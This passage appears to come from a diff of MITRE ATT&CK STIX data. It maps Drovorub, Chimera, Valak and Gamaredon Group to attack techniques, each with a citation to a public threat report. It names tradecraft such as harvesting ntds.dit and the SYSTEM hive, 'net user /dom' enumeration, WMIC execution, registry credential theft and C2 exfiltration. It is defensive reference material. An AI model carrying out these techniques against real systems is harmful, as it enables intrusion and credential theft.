85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--49eef071-24e0-456b-b4e7-618ab601c6f4", + "type": "relationship", + "modified": "2020-08-25T20:11:53.268Z", + "created": "2020-08-25T20:11:53.268Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can exfiltrate files over C2 infrastructure.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--a12ce761-4e08-4fcd-b00a-7b5eb082fda4", + "type": "relationship", + "modified": "2020-08-25T20:11:53.281Z", + "created": "2020-08-25T20:11:53.281Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can delete specific files from a compromised host.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--25609fb5-4f73-47ba-882e-56a421b7b566", + "type": "relationship", + "modified": "2020-08-26T15:20:09.606Z", + "created": "2020-08-26T15:20:09.606Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--029a75f4-62a8-4c9e-bdf2-ea2d8aed8900", + "type": "relationship", + "modified": "2020-09-18T20:55:03.300Z", + "created": "2020-08-26T15:20:09.635Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) has used XOR encrypted payloads in WebSocket client to server messages.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--20196489-8426-4cb7-a8f0-ca51bef7a385", + "type": "relationship", + "modified": "2020-08-26T18:38:18.071Z", + "created": "2020-08-26T18:38:18.071Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--99164b38-1775-40bc-b77b-a2373b14540a", + "target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "external_references": [ + { + "source_name": "NSA/FBI Drovorub August 2020", + "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF", + "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020." + } + ], + "description": "[Drovorub](https://attack.mitre.org/software/S0502) can use TCP to communicate between its agent and client modules.(Citation: NSA/FBI Drovorub August 2020)", + "relationship_type": "uses", + "id": "relationship--37b9ae2f-a386-41aa-90be-497de2d580f5", + "type": "relationship", + "modified": "2020-08-26T18:38:18.136Z", + "created": "2020-08-26T18:38:18.136Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used RDP to access targeted systems.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--e87cff7f-dc75-4dfc-9c45-ec697ff4644a", + "type": "relationship", + "modified": "2020-10-05T20:59:57.796Z", + "created": "2020-08-27T17:21:11.959Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used modified RAR software to archive data with a password.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--49fb7af8-50cf-4af5-9195-40b2351fa6dc", + "type": "relationship", + "modified": "2020-09-22T19:30:17.726Z", + "created": "2020-08-27T17:29:04.925Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--830c9528-df21-472c-8c14-a036bf17d665", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used Google Cloud's appspot service to host C2 servers.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--298e8a10-95d3-4dc1-a7c1-d4ec75b0874b", + "type": "relationship", + "modified": "2020-09-22T19:30:17.724Z", + "created": "2020-08-27T17:29:04.961Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has remotely copied tools and malware onto targeted systems.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--f94c1c97-ec5d-4703-93c1-91de05761d2a", + "type": "relationship", + "modified": "2020-08-27T17:29:05.205Z", + "created": "2020-08-27T17:29:05.205Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used a valid account to maintain persistence via scheduled task.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--2fff97fc-650c-4db5-97d4-c36db70077dd", + "type": "relationship", + "modified": "2020-08-27T17:29:05.220Z", + "created": "2020-08-27T17:29:05.220Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used WMIC to execute remote commands.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--e40a416e-ca15-4c15-b469-20549b81e6bd", + "type": "relationship", + "modified": "2020-08-27T17:29:05.225Z", + "created": "2020-08-27T17:29:05.225Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--21875073-b0ee-49e3-9077-1e2a885359af", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has has used net user /dom to enumerate domain accounts.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--57da83d5-2698-41b0-92b8-a92da8a4599c", + "type": "relationship", + "modified": "2020-08-27T17:29:05.229Z", + "created": "2020-08-27T17:29:05.229Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has gathered the SYSTEM registry and ntds.dit files from target systems.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--64abef3c-d453-4782-b084-25f684b3f7ae", + "type": "relationship", + "modified": "2020-09-29T18:43:01.568Z", + "created": "2020-08-27T17:29:05.237Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has renamed malware to GoogleUpdate.exe, impersonating legitimate Google filenames.(Citation: Cycraft Chimera April 2020)", + "relationship_type": "uses", + "id": "relationship--74cc85f8-594d-428b-a44a-5ede87df0ad9", + "type": "relationship", + "modified": "2020-09-22T19:30:17.758Z", + "created": "2020-08-27T17:46:41.092Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114)'s malware has altered the NTLM authentication program on domain controllers to allow [Chimera](https://attack.mitre.org/groups/G0114) to login without a valid credential.(Citation: Cycraft Chimera April 2020)\t", + "relationship_type": "uses", + "id": "relationship--42edbbf4-8779-47d8-bc9b-452073939a1a", + "type": "relationship", + "modified": "2020-09-29T18:15:51.990Z", + "created": "2020-08-27T21:22:39.718Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has encoded PowerShell commands.(Citation: Cycraft Chimera April 2020)\t", + "relationship_type": "uses", + "id": "relationship--79633fcf-d22a-40f0-a9be-52fc0608825f", + "type": "relationship", + "modified": "2020-08-27T21:22:39.755Z", + "created": "2020-08-27T21:22:39.755Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--8c1f0187-0826-4320-bddc-5f326cfcfe2c", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "Cycraft Chimera April 2020", + "url": "https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf", + "description": "Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020." + } + ], + "description": "[Chimera](https://attack.mitre.org/groups/G0114) has used PowerShell scripts to execute malicious payloads.(Citation: Cycraft Chimera April 2020)\t", + "relationship_type": "uses", + "id": "relationship--6337cf38-4b52-4e3d-a63e-670e077ec52f", + "type": "relationship", + "modified": "2020-08-27T21:22:39.805Z", + "created": "2020-08-27T21:22:39.805Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597", + "external_references": [ + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) has been delivered via spearphishing e-mails with password protected ZIP files.(Citation: Unit 42 Valak July 2020)", + "relationship_type": "uses", + "id": "relationship--7e9f9565-d9c5-47e5-a962-8dfa3dc77fc6", + "type": "relationship", + "modified": "2020-08-31T13:34:16.038Z", + "created": "2020-08-31T13:34:16.038Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "external_references": [ + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can execute tasks via OLE.(Citation: SentinelOne Valak June 2020)", + "relationship_type": "uses", + "id": "relationship--6bc33571-c702-4fcc-9f1c-b87d5a842586", + "type": "relationship", + "modified": "2020-08-31T14:56:42.326Z", + "created": "2020-08-31T14:56:42.326Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "external_references": [ + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can use wmic process call create in a scheduled task to launch plugins and for execution.(Citation: SentinelOne Valak June 2020)", + "relationship_type": "uses", + "id": "relationship--e91ec241-b329-4488-ac65-442992f84fb5", + "type": "relationship", + "modified": "2020-09-25T17:35:37.197Z", + "created": "2020-08-31T14:56:42.393Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "external_references": [ + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) has used packed DLL payloads.(Citation: SentinelOne Valak June 2020)", + "relationship_type": "uses", + "id": "relationship--9ab85095-bac1-4b21-8e9d-e24c084af0d2", + "type": "relationship", + "modified": "2020-08-31T14:56:42.450Z", + "created": "2020-08-31T14:56:42.450Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7", + "external_references": [ + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) has been delivered via malicious links in e-mail.(Citation: SentinelOne Valak June 2020)", + "relationship_type": "uses", + "id": "relationship--edb83e19-bc71-455e-bf38-4ab5c823ebc8", + "type": "relationship", + "modified": "2020-08-31T14:56:42.486Z", + "created": "2020-08-31T14:56:42.486Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--04fd5427-79c7-44ea-ae13-11b24778ff1c", + "external_references": [ + { + "source_name": "Unit 42 Valak July 2020", + "url": "https://unit42.paloaltonetworks.com/valak-evolution/", + "description": "Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) has returned C2 data as encoded ASCII.(Citation: Unit 42 Valak July 2020)", + "relationship_type": "uses", + "id": "relationship--be99408a-dc65-41a0-83db-235d8495e55c", + "type": "relationship", + "modified": "2020-08-31T14:56:42.514Z", + "created": "2020-08-31T14:56:42.514Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", + "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "external_references": [ + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." + } + ], + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used modules that automatically upload gathered documents to the C2 server.(Citation: ESET Gamaredon June 2020)", + "relationship_type": "uses", + "id": "relationship--c623d41f-3af0-4e3a-bf4f-8550bec85b37", + "type": "relationship", + "modified": "2020-08-31T15:06:48.118Z", + "created": "2020-08-31T15:06:48.118Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", + "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "external_references": [ + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." + } + ], + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has deployed scripts on compromised systems that automatically scan for interesting documents.(Citation: ESET Gamaredon June 2020)", + "relationship_type": "uses", + "id": "relationship--1de5c5fb-ba73-446b-8596-225cb5bcb611", + "type": "relationship", + "modified": "2020-08-31T15:06:48.148Z", + "created": "2020-08-31T15:06:48.148Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", + "target_ref": "attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c", + "external_references": [ + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." + } + ], + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has collected Microsoft Office documents from mapped network drives.(Citation: ESET Gamaredon June 2020)", + "relationship_type": "uses", + "id": "relationship--4716b9ec-a0d4-47db-a901-5a3b67d9e096", + "type": "relationship", + "modified": "2020-08-31T15:06:48.160Z", + "created": "2020-08-31T15:06:48.160Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", + "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5", + "external_references": [ + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." + } + ], + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) malware has used rundll32 to launch additional malicious components.(Citation: ESET Gamaredon June 2020)", + "relationship_type": "uses", + "id": "relationship--29e9bfd8-e2d3-4e25-8683-6605d99538de", + "type": "relationship", + "modified": "2020-08-31T15:06:48.172Z", + "created": "2020-08-31T15:06:48.172Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf", + "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "external_references": [ + { + "source_name": "ESET Gamaredon June 2020", + "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/", + "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020." + } + ], + "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has injected malicious macros into all Word and Excel documents on mapped network drives.(Citation: ESET Gamaredon June 2020)", + "relationship_type": "uses", + "id": "relationship--9b2ff8c9-3811-4615-a0c7-d79a14b7ade6", + "type": "relationship", + "modified": "2020-08-31T15:06:48.169Z", + "created": "2020-08-31T15:06:48.169Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580", + "external_references": [ + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020." + } + ], + "description": "[Valak](https://attack.mitre.org/software/S0476) can use the clientgrabber module to steal e-mail credentials from the Registry.(Citation: SentinelOne Valak June 2020)", + "relationship_type": "uses", + "id": "relationship--92c6a85d-d8b4-44d2-acf4-53ae07f69f77", + "type": "relationship", + "modified": "2020-08-31T15:15:56.120Z", + "created": "2020-08-31T15:15:56.120Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ade37ada-14af-4b44-b36c-210eec255d53", + "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "external_references": [ + { + "source_name": "SentinelOne Valak June 2020", + "url": "https://assets.sentinelone.com/labs/sentinel-one-valak-i ", + "description": "Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi 